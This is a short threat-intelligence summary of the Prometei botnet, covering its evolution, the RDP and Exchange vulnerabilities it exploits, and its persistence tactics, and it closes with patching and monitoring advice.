A recent investigation has provided critical insights into the evolution and activity of the Prometei botnet, a malware network that has posed a significant threat to organizational networks since at least 2016. Prometei operates as a modular botnet, allowing attackers to maintain remote control over compromised machines, deploy additional malware, and orchestrate large-scale cyber attacks. In particular, this botnet has been utilized to conduct cryptocurrency mining, primarily targeting Monero, while also gathering valuable credentials to facilitate further compromises.
Evolution of the Prometei Botnet
First identified in 2016, Prometei has undergone numerous iterations, with the most recent version 3 being released in late 2022. Each new version has expanded Prometei’s capabilities, making it harder to detect and defend against. The latest iteration incorporates a Domain Generation Algorithm (DGA) to manage Command-and-Control (C2) infrastructure, allowing the botnet to continuously update and evade defensive measures. This C2 mechanism is crucial to Prometei’s resilience, as it enables persistent connectivity between infected systems and the botnet operators even if some C2 servers are detected and blocked.
By early 2023, Prometei was found to have compromised over 10,000 systems worldwide, with significant clusters of activity in Brazil, Indonesia, and Turkey. This broad geographic reach, combined with Prometei’s modular structure, enables attackers to rapidly adapt and spread across diverse environments, intensifying its impact on a global scale.
Attack Vectors and Exploited Vulnerabilities
Prometei’s spread is largely driven by exploiting well-known vulnerabilities, which highlights the critical importance of regular patching and proactive vulnerability management. Key vulnerabilities targeted by Prometei include:
- BlueKeep (CVE-2019–0708): An exploit targeting a critical vulnerability in older versions of Microsoft’s Remote Desktop Protocol (RDP), allowing attackers to gain unauthorized remote access.
- Microsoft Exchange Server Vulnerabilities (CVE-2021–27065 and CVE-2021–26858): Used by Prometei to gain a foothold within enterprise environments through Exchange Server exploits, these vulnerabilities allow the attackers to execute arbitrary code remotely.
In addition to these exploits, Prometei also leverages PowerShell scripts to download and execute its payloads, further aiding its spread and persistence within targeted environments.
Tactics for Persistence and Evasion
Prometei employs a variety of tactics to maintain long-term persistence and evade detection:
- Use of Apache Web Server with a PHP Web Shell: A bundled Apache server, combined with a PHP-based web shell, serves as a foothold for attackers, enabling them to remain in control of the compromised device and bypass traditional security measures.
- Self-Updating Mechanisms: The botnet’s infrastructure enables it to self-update, reducing reliance on attacker intervention. This feature is critical to Prometei’s adaptability and resilience, as it can evolve autonomously in response to new defenses.
- Compressed Archive Components: Prometei’s modular nature is supported by downloading compressed archives that contain multiple botnet components. These archives allow attackers to add, replace, or remove specific features as needed, streamlining their operations and making the botnet more agile against detection.
The Prometei botnet demonstrates how attackers can effectively leverage vulnerabilities and modular malware architecture to create an adaptable and resilient botnet. As Prometei continues to evolve and incorporate new techniques, organizations must implement proactive monitoring, apply security patches, and strengthen endpoint detection capabilities to mitigate the risk.
For an in-depth review of Prometei’s tactics, techniques, and procedures, view the full report here.